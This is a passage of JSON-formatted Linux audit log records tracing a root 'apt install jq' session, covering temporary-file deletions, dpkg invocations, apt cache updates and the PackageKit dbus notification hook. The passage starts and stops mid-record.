"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.DOwSwY",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.573:835",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.QIXrgX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.573:836",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.bp1kfZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.577:837",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.7RYqrX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.581:838",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.tOm080",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.585:839",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.rfOSqY",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.589:840",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.sht1z0",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.593:841",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.ardvMX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.597:842",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7749,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c5513fa70",
"0x564c550dc2a0",
"0x564c55113550",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.621:843",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7750,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c550ab2e0",
"0x564c550aac20",
"0x564c55113550",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.633:844",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x24",
"0x1a4",
"0x564c550c1020",
"0x180"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 133354,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.633:845",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x24",
"0x1a4",
"0x564c554e13b0",
"0xffffffff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 133354,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.661:846",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c554e12b0",
"0x564c550ad380",
"0x0",
"0x564c55024a82"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/",
"inode": 138201,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/",
"inode": 138201,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/cache/apt/pkgcache.bin.yOTkhX",
"inode": 133354,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/cache/apt/pkgcache.bin",
"inode": 133354,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.669:847",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7751,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c554e1200",
"0x564c551472e0",
"0x564c55113550",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.681:848",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7752,
"pid": 7753,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f37c18eb5aa",
"0x7ffe41acca40",
"0x564c55113550",
"0x8"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"sh",
"-c",
"/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"sh",
"-c",
"/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/sy"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470478.683,
"ppid": 7575
}
}
{
"ID": "1632470478.685:849",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7753,
"pid": 7755,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "test",
"exe": "/usr/bin/test",
"key": "rootcmd",
"ARGV": [
"0x55e18fe1fbd8",
"0x55e18fe1fcc0",
"0x55e18fe1fce0",
"0x7f077b9fa850"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/test",
"-e",
"/usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/test",
"inode": 787552,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/test",
"-e",
"/usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
],
"launch_time": 1632470478.681,
"ppid": 7752
}
}
{
"ID": "1632470478.685:850",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7753,
"pid": 7756,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "test",
"exe": "/usr/bin/test",
"key": "rootcmd",
"ARGV": [
"0x55e18fe1fbd8",
"0x55e18fe1fc48",
"0x55e18fe1fcb8",
"0x7f077b9fa850"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/usr/bin/test",
"-S",
"/var/run/dbus/system_bus_socket"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/test",
"inode": 787552,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/test",
"-S",
"/var/run/dbus/system_bus_socket"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
],
"launch_time": 1632470478.681,
"ppid": 7752
}
}
{
"ID": "1632470478.685:851",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7753,
"pid": 7757,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "gdbus",
"exe": "/usr/bin/gdbus",
"key": "rootcmd",
"ARGV": [
"0x55e18fe1fbd8",
"0x55e18fe1fdc8",
"0x55e18fe1ffb8",
"0x7f077b9fa850"
]
},
"EXECVE": {
"argc": 12,
"ARGV": [
"/usr/bin/gdbus",
"call",
"--system",
"--dest",
"org.freedesktop.PackageKit",
"--object-path",
"/org/freedesktop/PackageKit",
"--timeout",
"4",
"--method",
"org.freedesktop.PackageKit.StateHasChanged",
"cache-update"
]
},
"CWD": {
"cwd": "/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/gdbus",
"inode": 787099,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/gdbus",
"call",
"--system",
"--dest",
"org.freedesktop.PackageKit",
"--object-path",
"/org/freedesktop/PackageKit",
"--timeout",
"4",
"--method",
"or"
]
},
"PARENT_INFO": {
"ARGV": [
"sh",
"-c",
"/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null"
],
"launch_time": 1632470478.681,
"ppid": 7752
}
}
{
"ID": "1632470478.697:852",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1,
"pid": 7760,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "packagekitd",
"exe": "/usr/lib/packagekit/packagekitd",
"key": "rootcmd",
"ARGV": [
"0x556cefc0fe10",
"0x556cefc41d10",
"0x556cefcfdcf0",
"0x556cefd587f0"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"/usr/lib/packagekit/packagekitd"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/packagekit/packagekitd",
"inode": 788012,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
